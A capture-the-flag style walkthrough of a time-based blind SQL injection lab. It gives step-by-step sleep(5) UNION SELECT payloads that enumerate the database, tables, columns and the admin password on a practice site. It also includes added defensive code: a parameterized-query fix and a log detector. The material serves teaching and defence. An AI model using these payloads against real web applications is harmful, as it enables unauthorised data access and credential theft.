
Time-based Blind SQL Injection

This is similar to the Boolean-based blind SQL injection described earlier in that the same kind of requests are sent, but this time there is no visual cue as to whether a query is correct or incorrect. Instead, you judge whether a query is correct by how long it takes to complete. The time delay is created by combining a UNION statement with a built-in function such as SLEEP(x): SLEEP() is only ever called after the UNION SELECT statement has succeeded.

To illustrate time-based blind SQL injection, let's use a sample web application. A screenshot of the application is provided below.

In the screenshot above you can see two pages: the upper one is susceptible to time-based SQL injection, and the lower one is the login page we will log in to after exploiting the upper one.

So let's start.

Boolean-based and time-based blind SQL injection are therefore very similar; the only difference is in the response. Boolean-based SQL injection gives us results in the form of true or false, 1/0 or similar outcomes, whereas time-based SQL injection produces results in the form of time delays.

For instance, we have created a payload that causes a delay of five seconds if a table named "users" exists. If there is no five-second delay, the table named "users" does not exist.

So let's start exploiting it.

In the screenshot at the top I highlighted the vulnerable page. The vulnerable URL is:

https://website.thm/analytics?referrer=tryhackme.com

The referrer parameter is therefore the injection point. The query executed on the backend when our payloads are sent is:

select * from analytics_referrers where domain='tryhackme.com' LIMIT 1
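To make the cause and the fix concrete, here is an added example (not the lab's code) that rebuilds this query in Python against an in-memory SQLite table, once by string concatenation as the lab's backend does and once with a bound parameter. It assumes a two-column analytics_referrers table and substitutes a visible extra row for sleep(), since SQLite has no such function; the table contents, probe strings and function names are constructed for the illustration.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's analytics_referrers table (the real backend
# is MySQL; SQLite is used so the example runs offline). Two columns, so a two-column
# UNION SELECT lines up exactly as in the post's payloads.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE analytics_referrers (id INTEGER, domain TEXT)")
    conn.execute("INSERT INTO analytics_referrers VALUES (1, 'tryhackme.com')")
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, referrer: str) -> list:
    # Vulnerable: the parameter is spliced into the SQL text, so a single quote in the
    # input ends the literal and everything after it is parsed as SQL (the lab's query).
    sql = f"select * from analytics_referrers where domain='{referrer}' LIMIT 1"
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, referrer: str) -> list:
    # Hardened: the value is bound as a parameter (? for sqlite3, %s for the common MySQL
    # drivers), so the database receives it as data, never as part of the statement.
    sql = "select * from analytics_referrers where domain=? LIMIT 1"
    return conn.execute(sql, (referrer,)).fetchall()

# SQLite has no sleep(); a constant row (1, NULL) stands in for the 5-second delay, so an
# injected condition shows up as an extra row when true and as nothing when false.
# "-- -" comments out the trailing "' LIMIT 1" just as in the post's payloads.
PROBE_TRUE = "unknown.example' UNION SELECT 1,NULL where length('abc')=3-- -"
PROBE_FALSE = "unknown.example' UNION SELECT 1,NULL where length('abc')=4-- -"

if __name__ == "__main__":
    db = make_db()
    for label, probe in (("true", PROBE_TRUE), ("false", PROBE_FALSE)):
        print(label, "vulnerable:", lookup_vulnerable(db, probe),
              "safe:", lookup_safe(db, probe))
```

With concatenation the true/false condition is observable in the result set (which is the oracle the rest of the lab relies on); with the bound parameter both probes return no rows because the whole string is compared as a domain name.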

Now let's exploit it.

Step 1 (Enumerate the database name)

Let's make a payload:

tryhackme.com' UNION SELECT sleep(5),NULL where database() like 's%'-- -

This payload checks whether the name of the database currently in use starts with the letter 's': if it matches, the query sleeps for 5 seconds; otherwise the page responds right away.

Before running the payloads below, find the length of the database name.

The payload for that is:

tryhackme.com' UNION SELECT sleep(5),NULL where length(database())=9-- -

The screenshot below shows that the page waits for 5 seconds, so the database name is 9 characters long.

So let's execute payloads, changing the first character one at a time as below:

  1. tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'a%'-- -
  2. tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'b%'-- -
  3. tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'c%'-- -
  4. tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'd%'-- -
  5. tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'e%'-- -

Execute these payloads in turn until the page sleeps for 5 seconds.

The page sleeps when we execute the payload below, so the first letter of the database name is 's'.

tryhackme.com' UNION SELECT sleep(5),NULL where database() like 's%'-- -

To find the second letter, the payload is:

tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'sa%'-- -

We again replace the second character with every candidate in turn; the one that makes us wait 5 seconds is:

tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'sq%'-- -

To get the full name, we brute-force each remaining character in the same way.

The final payload for the full name is:

tryhackme.com' UNION SELECT sleep(5),NULL where database() like 'sqli_four%'-- -

Now that we know the name of the database currently in use, the next step is to identify the table that contains the usernames.

Step 2 (Enumerate the table name)

In this step we identify the name of the table that contains user credentials.

Before making the payload, some background:

The table information_schema.tables has columns such as table_name and table_schema that contain metadata about all of the tables.

So let's make the payload:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'u%'-- -

Screenshot of the output of the above payload:

The above payload only sleeps for 5 seconds if a row exists with "sqli_four" in the table_schema column and a table_name that starts with "u".

Next, find the remaining characters of the table name that begins with "u".

Let's create the payload:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'ua%'-- -

Now try payloads one by one to find the second character:

  1. tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'ua%'-- -
  2. tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'ub%'-- -
  3. tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'uc%'-- -
  4. tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'ud%'-- -

Now try the payload below:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'us%'-- -

Executing the above payload returns the output after 5 seconds.

So the second character is 's'.

The final payload that we execute is:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.tables where table_schema='sqli_four' and table_name LIKE 'users%'-- -

So the table name is users.

Step 3 (Enumerate column names)

Now we list the column names of the table called users.

To determine the names of the columns, we use the table information_schema.columns, which contains metadata about all the columns of all the tables.

Let's make the payload:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema='sqli_four' and table_name='users' AND column_name LIKE 'u%'-- -

As the screenshot above shows, it slept for 5 seconds, so the users table has a column whose name starts with "u".

Now we search for the second character by trying each character in the second position. The payload that makes us wait is:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema='sqli_four' and table_name='users' AND column_name LIKE 'us%'-- -

After executing the above payload the page waits for five seconds, so we have the first two characters and the second character is 's'.

Continuing character by character in this way, the final payload is:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema='sqli_four' and table_name='users' AND column_name LIKE 'username%'-- -

So one column is 'username'.

In the same way we find the other column names, which are id and password.

The final payload for the password column is:

tryhackme.com' UNION SELECT sleep(5),NULL FROM information_schema.columns where table_schema='sqli_four' and table_name='users' AND column_name LIKE 'password%'-- -

Below is the screenshot of the above payload.

We now have the username and password columns of the users table, which is what we need.

Step 4 (Enumerate username and password)

We list each username first, followed by its password.

So let's look up the username "admin".

We must first determine whether the username “admin” actually exists.

Let's make the payload for that:

tryhackme.com' UNION SELECT sleep(5),NULL FROM users where username LIKE 'admin%'-- -

The application makes us wait for 5 seconds, which confirms that the admin user is present in the database.

Screenshot of the above payload:

Now enumerate the password for the 'admin' username.

Note that the password can contain any character, so we have to try each and every character at each position.

First we have to find the length of the password.

So let's make the payload for that:

tryhackme.com' UNION SELECT sleep(5),NULL FROM users where username='admin' and length(password)=4-- -

The above payload makes us wait for 5 seconds, so the length of the password is four.

Screenshot of the above payload is below.

Now let's make the payload for the first character of the password:

tryhackme.com' UNION SELECT sleep(5),NULL FROM users where username='admin' and password LIKE '4%'-- -

Screenshot of the above payload is below.

Here I tried many characters before this one, but they were not successful, and I have not shown them because the process is the same as the username enumeration.

So the final payload for the password enumeration is:

tryhackme.com' UNION SELECT sleep(5),NULL FROM users where username='admin' and password = '4961'-- -

After executing the above payload it makes us wait for 5 seconds, so the password for the 'admin' user is '4961'.

Screenshot for the above:

If we try to log in with these credentials, we are logged in; the screenshot for that is below.

So that's all for the time-based SQL injection lab.
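From the defender's side, the pattern in this lab is many near-identical requests to one parameter, of which only the correct guesses are slow. The following is an added example, not part of the lab, that checks constructed access-log lines for both the SQL constructs the payloads rely on and anomalously slow responses; the log format (method, path with query, status, response time in ms), the parameter name and the 3000 ms threshold are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (not from the lab). The payloads are URL-encoded forms of
# the ones shown in the post: the length-9 and table-name probes are correct guesses and
# come back slow, while the wrong guess (like 'a%') returns as fast as a normal request.
SAMPLE_LOG = """\
GET /analytics?referrer=tryhackme.com 200 41
GET /analytics?referrer=tryhackme.com%27+UNION+SELECT+sleep%285%29%2CNULL+where+length%28database%28%29%29%3D9--+- 200 5044
GET /analytics?referrer=google.com 200 37
GET /analytics?referrer=tryhackme.com%27+UNION+SELECT+sleep%285%29%2CNULL+where+database%28%29+like+%27a%25%27--+- 200 39
GET /analytics?referrer=tryhackme.com%27+UNION+SELECT+sleep%285%29%2CNULL+FROM+information_schema.tables+where+table_schema%3D%27sqli_four%27+and+table_name+LIKE+%27u%25%27--+- 200 5051
"""

# Constructs this technique depends on; case-insensitive and tolerant of extra whitespace.
SQLI_SIGNATURE = re.compile(
    r"(?i)\b(?:sleep|benchmark)\s*\(|union\s+(?:all\s+)?select|information_schema\s*\.|\bdatabase\s*\(\s*\)"
)

def analyze(log: str, slow_ms: int = 3000, param: str = "referrer") -> list[tuple[int, list[str]]]:
    """Return (line number, reasons) for each request that looks like a time-based probe.

    'signature' means the decoded parameter value contains an injection construct;
    'slow' means the response time exceeded slow_ms. A probe with a wrong guess is
    fast, so latency alone misses most of the enumeration; the signature catches it.
    """
    findings = []
    for lineno, line in enumerate(log.splitlines(), start=1):
        _method, target, _status, ms = line.split()
        # parse_qs percent-decodes the value, so encoded quotes cannot hide the payload.
        values = parse_qs(urlsplit(target).query).get(param, [])
        reasons = []
        if any(SQLI_SIGNATURE.search(v) for v in values):
            reasons.append("signature")
        if int(ms) >= slow_ms:
            reasons.append("slow")
        if reasons:
            findings.append((lineno, reasons))
    return findings

if __name__ == "__main__":
    for lineno, reasons in analyze(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

Raising the latency threshold alone (for example to 10000 ms) drops every 'slow' finding while the signature matches remain, which is why the two checks belong together.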

Thank you
